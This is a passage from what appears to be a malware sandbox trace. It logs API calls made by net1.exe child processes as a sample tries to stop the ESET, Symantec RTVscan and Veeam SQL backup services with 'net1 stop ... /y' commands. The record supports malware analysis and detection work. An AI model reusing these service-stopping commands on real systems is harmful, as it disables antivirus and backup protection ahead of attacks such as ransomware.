lpUsedDefaultChar=0x0) returned 2 [0113.759] WriteFile (in: hFile=0x0, lpBuffer=0x456150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfa80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfa80, lpOverlapped=0x0) returned 0 [0113.759] LocalFree (hMem=0x456150) returned 0x0 [0113.759] NetApiBufferFree (Buffer=0x451ad0) returned 0x0 [0113.759] NetApiBufferFree (Buffer=0x451ae8) returned 0x0 [0113.759] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0113.759] exit (_Code=2) Process: id = "178" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x20e7d000" os_pid = "0x1208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "74" os_parent_pid = "0xe54" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 565 os_tid = 0x120c [0113.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfeb4 | out: lpSystemTimeAsFileTime=0x2bfeb4*(dwLowDateTime=0x175e7610, dwHighDateTime=0x1d6f0d1)) [0113.426] GetCurrentProcessId () returned 0x1208 [0113.426] GetCurrentThreadId () returned 0x120c [0113.426] GetTickCount () returned 0x114fae3 [0113.426] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfeac | out: lpPerformanceCount=0x2bfeac*=23252731546) returned 1 [0113.427] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.427] __set_app_type (_Type=0x1) [0113.427] __p__fmode () returned 0x770331f4 [0113.427] __p__commode () returned 0x770331fc [0113.427] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.427] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.427] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.427] GetConsoleOutputCP () returned 0x1b5 [0113.428] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.431] sprintf_s (in: _DstBuf=0x2bfe6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.432] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.629] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.629] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0113.629] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bfc38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.629] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x7c) returned 0x623af8 [0113.629] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.629] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfe3c | out: Buffer=0x2bfe3c*=0x621b00) returned 0x0 [0113.629] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfe3c | out: Buffer=0x2bfe3c*=0x621b18) returned 0x0 [0113.629] _fileno (_File=0x77032900) returned -2 [0113.629] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.629] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.629] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.630] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.630] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.630] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.630] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.630] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.630] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.630] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.630] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.630] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.630] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.630] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.630] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.630] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.630] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.630] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.630] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.630] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.630] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.630] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.630] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0113.630] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0113.630] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0113.630] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0113.630] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0113.630] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0113.630] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0113.630] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0113.630] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0113.630] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0113.631] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0113.631] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0113.631] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0113.631] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.631] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0113.631] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0113.631] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0113.631] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0113.631] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0113.631] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.631] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.631] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0113.631] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.631] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.631] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.631] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.631] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.631] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.631] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0113.631] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0113.631] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0113.632] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.632] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.632] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.632] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0113.632] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0113.632] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0113.632] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0113.632] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6254d8 [0113.730] GetServiceKeyNameW (in: hSCManager=0x6254d8, lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0x39aaf0, lpcchBuffer=0x2bfdd8 | out: lpServiceName="", lpcchBuffer=0x2bfdd8) returned 0 [0113.736] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0113.736] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0113.736] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.736] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.736] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.737] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.737] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0113.737] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.737] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.737] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0113.737] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0113.737] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0113.737] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0113.737] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.737] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.737] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0113.737] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0113.737] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0113.737] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0113.737] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x2bfdd4 | out: bufptr=0x2bfdd4) returned 0x889 [0113.760] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.760] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.761] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.762] GetFileType (hFile=0x0) returned 0x0 [0113.762] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x623ef8 [0113.762] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x623ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\na", lpUsedDefaultChar=0x0) returned 30 [0113.762] WriteFile (in: hFile=0x0, lpBuffer=0x623ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bfd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfd14, lpOverlapped=0x0) returned 0 [0113.762] LocalFree (hMem=0x623ef8) returned 0x0 [0113.762] GetFileType (hFile=0x0) returned 0x0 [0113.762] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6261a0 [0113.762] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6261a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0113.762] WriteFile (in: hFile=0x0, lpBuffer=0x6261a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfd14, lpOverlapped=0x0) returned 0 [0113.762] LocalFree (hMem=0x6261a0) returned 0x0 [0113.763] _ultow (in: _Dest=0x889, _Radix=2882884 | out: _Dest=0x889) returned="2185" [0113.763] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.763] GetFileType (hFile=0x0) returned 0x0 [0113.763] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6261a0 [0113.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6261a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.763] WriteFile (in: hFile=0x0, lpBuffer=0x6261a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bfd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfd20, lpOverlapped=0x0) returned 0 [0113.763] LocalFree (hMem=0x6261a0) returned 0x0 [0113.763] GetFileType (hFile=0x0) returned 0x0 [0113.763] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6261a0 [0113.763] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6261a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0113.763] WriteFile (in: hFile=0x0, lpBuffer=0x6261a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfd20, lpOverlapped=0x0) returned 0 [0113.763] LocalFree (hMem=0x6261a0) returned 0x0 [0113.763] NetApiBufferFree (Buffer=0x621b00) returned 0x0 [0113.764] NetApiBufferFree (Buffer=0x621b18) returned 0x0 [0113.764] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0113.764] exit (_Code=2) Process: id = "179" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x21337000" os_pid = "0x1210" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "66" os_parent_pid = "0xd50" cmd_line = "C:\\Windows\\system32\\net1 stop RTVscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 566 os_tid = 0x1214 [0113.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fe64 | out: lpSystemTimeAsFileTime=0x33fe64*(dwLowDateTime=0x1760d770, dwHighDateTime=0x1d6f0d1)) [0113.451] GetCurrentProcessId () returned 0x1210 [0113.451] GetCurrentThreadId () returned 0x1214 [0113.452] GetTickCount () returned 0x114faf2 [0113.452] QueryPerformanceCounter (in: lpPerformanceCount=0x33fe5c | out: lpPerformanceCount=0x33fe5c*=23255243836) returned 1 [0113.452] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.452] __set_app_type (_Type=0x1) [0113.452] __p__fmode () returned 0x770331f4 [0113.452] __p__commode () returned 0x770331fc [0113.452] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.452] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.452] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.452] GetConsoleOutputCP () returned 0x1b5 [0113.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.453] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.455] sprintf_s (in: _DstBuf=0x33fe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.455] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.635] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.636] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RTVscan /y" [0113.636] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33fbe8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x62) returned 0x763ad0 [0113.636] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.636] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fdec | out: Buffer=0x33fdec*=0x761ad8) returned 0x0 [0113.636] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fdec | out: Buffer=0x33fdec*=0x761af0) returned 0x0 [0113.636] _fileno (_File=0x77032900) returned -2 [0113.636] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.636] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.636] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.636] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.636] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.636] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.636] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.636] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.636] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.637] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.637] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.637] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.637] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.637] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.637] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.637] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.637] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.637] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.637] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.637] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.637] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.637] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.637] _wcsicmp (_String1="accounts", _String2="RTVscan") returned -17 [0113.637] _wcsicmp (_String1="computer", _String2="RTVscan") returned -15 [0113.637] _wcsicmp (_String1="config", _String2="RTVscan") returned -15 [0113.637] _wcsicmp (_String1="continue", _String2="RTVscan") returned -15 [0113.637] _wcsicmp (_String1="cont", _String2="RTVscan") returned -15 [0113.637] _wcsicmp (_String1="file", _String2="RTVscan") returned -12 [0113.637] _wcsicmp (_String1="files", _String2="RTVscan") returned -12 [0113.637] _wcsicmp (_String1="group", _String2="RTVscan") returned -11 [0113.637] _wcsicmp (_String1="groups", _String2="RTVscan") returned -11 [0113.637] _wcsicmp (_String1="help", _String2="RTVscan") returned -10 [0113.637] _wcsicmp (_String1="helpmsg", _String2="RTVscan") returned -10 [0113.637] _wcsicmp (_String1="localgroup", _String2="RTVscan") returned -6 [0113.637] _wcsicmp (_String1="pause", _String2="RTVscan") returned -2 [0113.637] _wcsicmp (_String1="session", _String2="RTVscan") returned 1 [0113.637] _wcsicmp (_String1="sessions", _String2="RTVscan") returned 1 [0113.637] _wcsicmp (_String1="sess", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="share", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="start", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="stats", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="statistics", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="stop", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="time", _String2="RTVscan") returned 2 [0113.638] _wcsicmp (_String1="user", _String2="RTVscan") returned 3 [0113.638] _wcsicmp (_String1="users", _String2="RTVscan") returned 3 [0113.638] _wcsicmp (_String1="msg", _String2="RTVscan") returned -5 [0113.638] _wcsicmp (_String1="messenger", _String2="RTVscan") returned -5 [0113.638] _wcsicmp (_String1="receiver", _String2="RTVscan") returned -15 [0113.638] _wcsicmp (_String1="rcv", _String2="RTVscan") returned -17 [0113.638] _wcsicmp (_String1="netpopup", _String2="RTVscan") returned -4 [0113.638] _wcsicmp (_String1="redirector", _String2="RTVscan") returned -15 [0113.638] _wcsicmp (_String1="redir", _String2="RTVscan") returned -15 [0113.638] _wcsicmp (_String1="rdr", _String2="RTVscan") returned -16 [0113.638] _wcsicmp (_String1="workstation", _String2="RTVscan") returned 5 [0113.638] _wcsicmp (_String1="work", _String2="RTVscan") returned 5 [0113.638] _wcsicmp (_String1="wksta", _String2="RTVscan") returned 5 [0113.638] _wcsicmp (_String1="prdr", _String2="RTVscan") returned -2 [0113.638] _wcsicmp (_String1="devrdr", _String2="RTVscan") returned -14 [0113.638] _wcsicmp (_String1="lanmanworkstation", _String2="RTVscan") returned -6 [0113.638] _wcsicmp (_String1="server", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="svr", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="srv", _String2="RTVscan") returned 1 [0113.638] _wcsicmp (_String1="lanmanserver", _String2="RTVscan") returned -6 [0113.638] _wcsicmp (_String1="alerter", _String2="RTVscan") returned -17 [0113.638] _wcsicmp (_String1="netlogon", _String2="RTVscan") returned -4 [0113.639] _wcsupr (in: _String="RTVscan" | out: _String="RTVSCAN") returned="RTVSCAN" [0113.639] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x765498 [0113.730] GetServiceKeyNameW (in: hSCManager=0x765498, lpDisplayName="RTVSCAN", lpServiceName=0x39aaf0, lpcchBuffer=0x33fd88 | out: lpServiceName="", lpcchBuffer=0x33fd88) returned 0 [0113.737] _wcsicmp (_String1="msg", _String2="RTVSCAN") returned -5 [0113.737] _wcsicmp (_String1="messenger", _String2="RTVSCAN") returned -5 [0113.737] _wcsicmp (_String1="receiver", _String2="RTVSCAN") returned -15 [0113.737] _wcsicmp (_String1="rcv", _String2="RTVSCAN") returned -17 [0113.738] _wcsicmp (_String1="redirector", _String2="RTVSCAN") returned -15 [0113.738] _wcsicmp (_String1="redir", _String2="RTVSCAN") returned -15 [0113.738] _wcsicmp (_String1="rdr", _String2="RTVSCAN") returned -16 [0113.738] _wcsicmp (_String1="workstation", _String2="RTVSCAN") returned 5 [0113.738] _wcsicmp (_String1="work", _String2="RTVSCAN") returned 5 [0113.738] _wcsicmp (_String1="wksta", _String2="RTVSCAN") returned 5 [0113.738] _wcsicmp (_String1="prdr", _String2="RTVSCAN") returned -2 [0113.738] _wcsicmp (_String1="devrdr", _String2="RTVSCAN") returned -14 [0113.738] _wcsicmp (_String1="lanmanworkstation", _String2="RTVSCAN") returned -6 [0113.738] _wcsicmp (_String1="server", _String2="RTVSCAN") returned 1 [0113.738] _wcsicmp (_String1="svr", _String2="RTVSCAN") returned 1 [0113.738] _wcsicmp (_String1="srv", _String2="RTVSCAN") returned 1 [0113.738] _wcsicmp (_String1="lanmanserver", _String2="RTVSCAN") returned -6 [0113.738] _wcsicmp (_String1="alerter", _String2="RTVSCAN") returned -17 [0113.738] _wcsicmp (_String1="netlogon", _String2="RTVSCAN") returned -4 [0113.738] NetServiceControl (in: servername=0x0, service="RTVSCAN", opcode=0x0, arg=0x0, bufptr=0x33fd84 | out: bufptr=0x33fd84) returned 0x889 [0113.765] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.765] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.765] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.766] GetFileType (hFile=0x0) returned 0x0 [0113.766] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x763eb8 [0113.767] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x763eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.767] WriteFile (in: hFile=0x0, lpBuffer=0x763eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33fcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcc4, lpOverlapped=0x0) returned 0 [0113.767] LocalFree (hMem=0x763eb8) returned 0x0 [0113.767] GetFileType (hFile=0x0) returned 0x0 [0113.767] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x766160 [0113.767] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x766160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nv", lpUsedDefaultChar=0x0) returned 2 [0113.767] WriteFile (in: hFile=0x0, lpBuffer=0x766160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcc4, lpOverlapped=0x0) returned 0 [0113.767] LocalFree (hMem=0x766160) returned 0x0 [0113.767] _ultow (in: _Dest=0x889, _Radix=3407092 | out: _Dest=0x889) returned="2185" [0113.767] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.767] GetFileType (hFile=0x0) returned 0x0 [0113.767] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x766160 [0113.767] WideCharToMultiByte 